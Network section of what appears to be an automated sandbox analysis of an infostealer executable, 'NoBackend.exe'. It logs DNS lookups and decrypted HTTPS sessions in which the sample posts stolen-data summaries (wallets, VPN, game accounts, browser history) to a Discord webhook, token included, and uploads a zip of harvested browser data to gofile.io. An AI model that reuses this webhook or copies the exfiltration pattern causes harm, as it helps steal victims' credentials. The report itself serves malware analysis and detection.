Nov 9, 2023 23:23:01.161700010 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.161943913 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.161957979 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.162091017 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.162095070 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.163038969 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.163111925 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.164045095 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.164144993 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.164191008 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.209259033 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.211265087 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.211283922 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.258894920 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.868350983 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.868444920 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.868510008 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.868926048 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.868926048 CET	49707	443	192.168.2.5	31.14.70.245
Nov 9, 2023 23:23:01.868937016 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.868947029 CET	443	49707	31.14.70.245	192.168.2.5
Nov 9, 2023 23:23:01.870354891 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:01.870383024 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:01.870445967 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:01.871424913 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:01.871436119 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.182343006 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.182734013 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.182760954 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.182892084 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.182898998 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.184334993 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.184403896 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.185465097 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.185547113 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.185575008 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.232815027 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:02.232836962 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:02.280641079 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:03.438999891 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:03.439194918 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:03.439270973 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:03.439337969 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:03.439361095 CET	443	49708	162.159.136.232	192.168.2.5
Nov 9, 2023 23:23:03.439377069 CET	49708	443	192.168.2.5	162.159.136.232
Nov 9, 2023 23:23:03.439384937 CET	443	49708	162.159.136.232	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2023 23:22:58.478346109 CET	60172	53	192.168.2.5	1.1.1.1
Nov 9, 2023 23:22:58.631212950 CET	53	60172	1.1.1.1	192.168.2.5
Nov 9, 2023 23:22:59.578552961 CET	54832	53	192.168.2.5	1.1.1.1
Nov 9, 2023 23:22:59.896331072 CET	53	54832	1.1.1.1	192.168.2.5
Nov 9, 2023 23:22:59.897980928 CET	61223	53	192.168.2.5	1.1.1.1
Nov 9, 2023 23:23:00.232791901 CET	53	61223	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 9, 2023 23:22:58.478346109 CET	192.168.2.5	1.1.1.1	0x8c6c	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:59.578552961 CET	192.168.2.5	1.1.1.1	0x456f	Standard query (0)	apiv2.gofile.io	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:59.897980928 CET	192.168.2.5	1.1.1.1	0x3ac4	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 9, 2023 23:22:58.631212950 CET	1.1.1.1	192.168.2.5	0x8c6c	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:58.631212950 CET	1.1.1.1	192.168.2.5	0x8c6c	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:58.631212950 CET	1.1.1.1	192.168.2.5	0x8c6c	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:58.631212950 CET	1.1.1.1	192.168.2.5	0x8c6c	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:58.631212950 CET	1.1.1.1	192.168.2.5	0x8c6c	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:22:59.896331072 CET	1.1.1.1	192.168.2.5	0x456f	Name error (3)	apiv2.gofile.io	none	none	A (IP address)	IN (0x0001)	false
Nov 9, 2023 23:23:00.232791901 CET	1.1.1.1	192.168.2.5	0x3ac4	No error (0)	store4.gofile.io		31.14.70.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

store4.gofile.io

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49704	162.159.136.232	443	C:\Users\user\Desktop\NoBackend.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-09 22:22:59 UTC	0	OUT	POST /api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344 HTTP/1.1 Host: discord.com User-Agent: Go-http-client/1.1 Content-Length: 565 Content-Type: application/json Accept-Encoding: gzip
2023-11-09 22:22:59 UTC	0	OUT	Data Raw: 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 61 75 74 68 6f 72 22 3a 7b 22 6e 61 6d 65 22 3a 22 4c 61 7a 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 7d 2c 22 63 6f 6c 6f 72 22 3a 37 33 35 31 36 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 5c 75 30 30 33 63 3a 63 72 79 70 74 6f 3a 31 31 35 34 38 39 38 33 38 32 36 39 35 39 37 33 30 39 36 5c 75 30 30 33 65 20 54 6f 74 61 6c 20 57 61 6c 6c 65 74 73 22 2c 22 76 61 6c 75 65 Data Ascii: {"avatar_url":"https://i.ibb.co/hVY5sGg/logo.png","embeds":[{"author":{"name":"Laze","url":"https://i.ibb.co/hVY5sGg/logo.png"},"color":735161,"description":"","fields":[{"inline":false,"name":"\u003c:crypto:1154898382695973096\u003e Total Wallets","value
2023-11-09 22:22:59 UTC	3	IN	HTTP/1.1 204 No Content Date: Thu, 09 Nov 2023 22:22:59 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=89ee946c7f4e11eea131eabb29fe9c15; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1699568581 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AnRalUc3YB4%2Fhc9C1Ca9BqwY1Civ34Gc9YJBDtcBqxnTywsSej8p8xuqUmwIJQqtkd%2F9DVg2HYvC9C61nqSWlLtfLebT%2FSwX5xDLH3%2FHYhsV%2B2vkTtlvLm2%2BSR5B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=89ee946c7f4e11eea131eabb29fe9c15c555720f36e0b29aaeca2e4f8d632f9c9fb1dbd5a5bfd8650dddbe80ebd56a83; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=b155ac4eb196349ba739350cc3253dbcc5f9044c-1699568579; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-11-09 22:22:59 UTC	4	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 6c 57 4c 75 32 77 4e 43 56 76 4c 45 61 5f 51 38 59 43 4f 68 49 4b 2e 69 43 70 75 66 78 44 35 74 39 4c 7a 4c 69 73 63 44 34 77 2d 31 36 39 39 35 36 38 35 37 39 33 37 34 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 33 39 37 35 32 34 31 38 39 64 66 38 64 35 2d 53 45 41 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=dlWLu2wNCVvLEa_Q8YCOhIK.iCpufxD5t9LzLiscD4w-1699568579374-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 82397524189df8d5-SEA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49705	162.159.136.232	443	C:\Users\user\Desktop\NoBackend.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-09 22:22:59 UTC	0	OUT	POST /api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344 HTTP/1.1 Host: discord.com User-Agent: Go-http-client/1.1 Content-Length: 1692 Content-Type: application/json Accept-Encoding: gzip
2023-11-09 22:22:59 UTC	1	OUT	Data Raw: 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 61 75 74 68 6f 72 22 3a 7b 22 6e 61 6d 65 22 3a 22 4c 61 7a 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 7d 2c 22 63 6f 6c 6f 72 22 3a 37 33 35 31 36 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 22 5c 75 30 30 33 63 3a 4d 75 6c 6c 76 61 64 3a 31 31 35 34 37 37 30 37 34 38 35 37 38 32 31 38 30 39 35 5c 75 30 30 33 65 20 4d 75 6c 6c 76 61 64 22 2c 22 76 61 6c 75 65 22 3a 22 5c 75 30 Data Ascii: {"avatar_url":"https://i.ibb.co/hVY5sGg/logo.png","embeds":[{"author":{"name":"Laze","url":"https://i.ibb.co/hVY5sGg/logo.png"},"color":735161,"description":"","fields":[{"inline":true,"name":"\u003c:Mullvad:1154770748578218095\u003e Mullvad","value":"\u0
2023-11-09 22:22:59 UTC	1	OUT	Data Raw: 39 38 30 35 31 37 34 38 33 35 5c 75 30 30 33 65 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 22 5c 75 30 30 33 63 3a 52 69 6f 74 47 61 6d 65 73 3a 31 31 35 34 37 37 31 36 30 35 32 37 33 31 38 32 32 31 39 5c 75 30 30 33 65 20 52 69 6f 74 20 47 61 6d 65 73 22 2c 22 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 3a 61 5f 3a 31 31 31 35 30 36 37 35 30 39 38 30 35 31 37 34 38 33 35 5c 75 30 30 33 65 5c 75 30 30 33 63 3a 61 5f 3a 31 31 31 35 30 36 37 35 30 39 38 30 35 31 37 34 38 33 35 5c 75 30 30 33 65 5c 75 30 30 33 63 3a 61 5f 3a 31 31 31 35 30 36 37 35 30 39 38 30 35 31 37 34 38 33 35 5c 75 30 30 33 65 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 74 72 75 65 2c 22 6e Data Ascii: 9805174835\u003e"},{"inline":true,"name":"\u003c:RiotGames:1154771605273182219\u003e Riot Games","value":"\u003c:a_:1115067509805174835\u003e\u003c:a_:1115067509805174835\u003e\u003c:a_:1115067509805174835\u003e"},{"inline":true,"n
2023-11-09 22:22:59 UTC	5	IN	HTTP/1.1 204 No Content Date: Thu, 09 Nov 2023 22:22:59 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=89f012d87f4e11ee97ee86bf86c81eb0; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1699568580 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kOc%2FDjCEmd4HQOjSWVVdlMLv9bLDW6aw4x8e%2Bb%2FxKjMKWA5UgFEFMn%2BHJ%2BDRsu2nkAywPE52hO8NKThhdbqIp0Eo0rM6wcb9PxNB57YQCkCqFdAQF5HIxE8zLC7o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=89f012d87f4e11ee97ee86bf86c81eb09ac5b183633adc7b76f38894c05a32e8059623110ecac0b588f46fbf5fc613c7; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=b155ac4eb196349ba739350cc3253dbcc5f9044c-1699568579; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-11-09 22:22:59 UTC	6	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 46 6c 75 45 56 5a 31 34 77 39 71 35 5f 44 2e 76 69 36 72 48 52 73 63 6d 36 34 47 50 6c 6c 31 66 37 36 30 79 59 79 69 37 70 63 59 2d 31 36 39 39 35 36 38 35 37 39 33 38 34 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 33 39 37 35 32 33 64 38 34 34 30 38 62 65 2d 53 45 41 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=FluEVZ14w9q5_D.vi6rHRscm64GPll1f760yYyi7pcY-1699568579384-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 82397523d84408be-SEA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49706	162.159.136.232	443	C:\Users\user\Desktop\NoBackend.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-09 22:22:59 UTC	2	OUT	POST /api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344 HTTP/1.1 Host: discord.com User-Agent: Go-http-client/1.1 Content-Length: 742 Content-Type: application/json Accept-Encoding: gzip
2023-11-09 22:22:59 UTC	2	OUT	Data Raw: 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 61 75 74 68 6f 72 22 3a 7b 22 6e 61 6d 65 22 3a 22 4c 61 7a 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 7d 2c 22 63 6f 6c 6f 72 22 3a 37 33 35 31 36 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 22 f0 9f 93 b0 20 48 69 73 74 6f 72 79 22 2c 22 76 61 6c 75 65 22 3a 22 60 30 60 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 22 7d 2c 7b 22 69 6e 6c 69 6e 65 22 3a 74 72 75 65 2c Data Ascii: {"avatar_url":"https://i.ibb.co/hVY5sGg/logo.png","embeds":[{"author":{"name":"Laze","url":"https://i.ibb.co/hVY5sGg/logo.png"},"color":735161,"description":"","fields":[{"inline":true,"name":" History","value":"`0`"},{"inline":true,
2023-11-09 22:22:59 UTC	6	IN	HTTP/1.1 204 No Content Date: Thu, 09 Nov 2023 22:22:59 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=89f10e187f4e11eeb69aa28292d7c5ca; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1699568581 x-ratelimit-reset-after: 2 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lPOWyIF1PqRYHb7pAX6HlB%2FIWYP74cqfPWHqwtDLxtKHtX01nTivvqE40OGuk5ZuXff%2BmU1OBIl6fPlmNDscKqtPdxKAuIJB3dmeK60SnaEvEtS6bICOITnptng4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=89f10e187f4e11eeb69aa28292d7c5cafcf8018804a82df23ca67e17743bb69442e407f7ac62faca46750dbc5cc2bf92; Expires=Tue, 07-Nov-2028 22:22:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=b155ac4eb196349ba739350cc3253dbcc5f9044c-1699568579; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-11-09 22:22:59 UTC	7	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 62 6b 62 75 50 36 66 49 6d 43 71 4d 4d 58 4c 58 49 56 53 6c 57 50 53 34 49 38 76 38 4a 58 30 31 65 55 77 34 35 35 32 4c 50 4d 51 2d 31 36 39 39 35 36 38 35 37 39 33 39 30 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 33 39 37 35 32 34 33 39 64 35 63 36 30 65 2d 53 45 41 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=bkbuP6fImCqMMXLXIVSlWPS4I8v8JX01eUw4552LPMQ-1699568579390-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8239752439d5c60e-SEA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49707	31.14.70.245	443	C:\Users\user\Desktop\NoBackend.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-09 22:23:01 UTC	8	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: Go-http-client/1.1 Content-Length: 867 Content-Type: multipart/form-data; boundary=51ea92ad58d48b8b445c2dcc8df694c0648c7b07dc862d70b7fe2b02a221 Accept-Encoding: gzip
2023-11-09 22:23:01 UTC	8	OUT	Data Raw: 2d 2d 35 31 65 61 39 32 61 64 35 38 64 34 38 62 38 62 34 34 35 63 32 64 63 63 38 64 66 36 39 34 63 30 36 34 38 63 37 62 30 37 64 63 38 36 32 64 37 30 62 37 66 65 32 62 30 32 61 32 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 61 6c 66 6f 6e 73 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 4c 47 50 4b 56 41 4f 41 4c 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 09 00 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 0b 00 42 72 6f 77 73 65 72 Data Ascii: --51ea92ad58d48b8b445c2dcc8df694c0648c7b07dc862d70b7fe2b02a221Content-Disposition: form-data; name="file"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\LGPKVAOAL.zip"Content-Type: application/octet-streamPKcBrowser
2023-11-09 22:23:01 UTC	9	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Origin: * Content-Length: 302 Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Content-Type: application/json; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Date: Thu, 09 Nov 2023 22:23:01 GMT Etag: W/"12e-1Jxvq1ubRGWeMGRO6+FFN5K1kms" Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Xss-Protection: 0 Connection: close
2023-11-09 22:23:01 UTC	10	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 53 77 37 74 70 52 46 6f 44 78 4e 65 6e 54 51 64 72 58 47 69 76 56 54 63 5a 6c 77 63 54 36 78 57 22 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f Data Ascii: {"status":"ok","data":{"guestToken":"Sw7tpRFoDxNenTQdrXGivVTcZlwcT6xW","downloadPage":"https://gofile.io/d/
2023-11-09 22:23:01 UTC	10	IN	Data Raw: 36 75 6f 36 50 7a 22 2c 22 63 6f 64 65 22 3a 22 36 75 6f 36 50 7a 22 2c 22 70 61 72 65 6e 74 46 6f 6c 64 65 72 22 3a 22 36 64 31 64 36 33 33 33 2d 63 30 64 65 2d 34 33 34 34 2d 61 65 33 64 2d 65 62 64 34 63 35 37 35 36 36 37 65 22 2c 22 66 69 6c 65 49 64 22 3a 22 31 38 30 35 62 31 32 36 2d 63 37 39 64 2d 34 35 36 63 2d 61 61 34 63 2d 36 30 35 35 30 36 36 34 64 30 63 30 22 2c 22 66 69 6c 65 4e 61 6d 65 22 3a 22 4c 47 50 4b 56 41 4f 41 4c 2e 7a 69 70 22 2c 22 6d 64 35 22 3a 22 64 61 38 63 33 65 32 37 37 30 66 32 34 30 66 30 66 38 38 32 61 63 61 30 33 30 33 33 37 39 64 66 22 7d 7d Data Ascii: 6uo6Pz","code":"6uo6Pz","parentFolder":"6d1d6333-c0de-4344-ae3d-ebd4c575667e","fileId":"1805b126-c79d-456c-aa4c-60550664d0c0","fileName":"LGPKVAOAL.zip","md5":"da8c3e2770f240f0f882aca0303379df"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49708	162.159.136.232	443	C:\Users\user\Desktop\NoBackend.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-09 22:23:02 UTC	10	OUT	POST /api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344 HTTP/1.1 Host: discord.com User-Agent: Go-http-client/1.1 Content-Length: 488 Content-Type: application/json Accept-Encoding: gzip
2023-11-09 22:23:02 UTC	10	OUT	Data Raw: 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 61 75 74 68 6f 72 22 3a 7b 22 6e 61 6d 65 22 3a 22 4c 61 7a 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 68 56 59 35 73 47 67 2f 6c 6f 67 6f 2e 70 6e 67 22 7d 2c 22 63 6f 6c 6f 72 22 3a 37 33 35 31 36 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 49 27 6d 20 64 6f 6e 65 20 3a 79 61 77 6e 69 6e 67 5f 66 61 63 65 3a 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 69 6e 6c 69 6e 65 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 f0 9f 94 a5 20 44 6f 77 6e 6c 6f 61 64 22 2c 22 76 61 6c 75 65 22 3a 22 5b 44 6f 77 6e 6c 6f 61 64 5d 28 68 74 74 Data Ascii: {"avatar_url":"https://i.ibb.co/hVY5sGg/logo.png","embeds":[{"author":{"name":"Laze","url":"https://i.ibb.co/hVY5sGg/logo.png"},"color":735161,"description":"I'm done 